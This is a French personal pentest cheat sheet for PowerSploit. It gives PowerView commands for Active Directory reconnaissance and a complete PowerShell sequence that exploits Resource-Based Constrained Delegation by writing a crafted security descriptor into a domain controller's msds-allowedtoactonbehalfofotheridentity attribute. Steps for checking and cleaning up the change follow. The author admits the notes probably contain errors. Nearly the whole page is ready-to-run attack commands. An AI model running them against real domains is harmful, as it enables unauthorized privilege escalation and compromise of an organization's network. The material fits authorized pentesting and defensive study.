Hacking Wiki

Notes persos. Il y a probablement beaucoup d'erreurs donc privilégiez des sources plus fiables.

View on GitHub

PowerSploit

Cheat-Sheet

Liste de commandes utiles en pentest interne.

# Contrôles de sécurité rapides
Get-DomainComputer -Unconstrained -Domain client.fr -Server DC.client.fr
Get-DomainUser -Admincount -Domain client.fr -Server DC.client.fr
Get-DomainGroupMember "Admins du domaine" -Domain client.fr -ServerDC.client.fr

Exploitation de la “Resource-Based Constrained Delegation”. Nécessite de lancer les commandes avec un compte qui a GenericWrite sur l’ordinateur TARGET et d’avoir un compte avec un SPN (ATTACKER) (Source)

# On récupère le SID de l’ordinateur qu’on a jouté
$ComputerSid = Get-DomainComputer COMPUTER -DomainController SERVEURDC.client.fr -Domain client.fr -Properties objectsid | Select -Expand objectsid;
# On crée un « Security Descriptor » avec le compte correspondant
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))";
$SDBytes = New-Object byte[] ($SD.BinaryLength);
$SD.GetBinaryForm($SDBytes, 0);
# On modifie le champ 'msds-allowedtoactonbehalfofotheridentity'
Get-DomainComputer SERVEURDC -DomainController SERVEURDC.client.fr -Domain client.fr | Set-DomainObject -DomainController SERVEURDC.client.fr -Domain client.fr -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes};

# Les commande suivantes permettent de vérifier que la modif a bien été effectuée
$RawBytes = Get-DomainComputer SERVEURDC -DomainController SERVEURDC.client.fr -Domain client.fr -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity;
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
$Descriptor.DiscretionaryAcl

# Cleanup
Get-DomainComputer SERVEURDC -DomainController SERVEURDC.client.fr -Domain client.fr | Set-DomainObject -Clear 'msds-allowedtoactonbehalfofotheridentity'  -DomainController SERVEURDC.client.fr -Domain client.fr

Ressources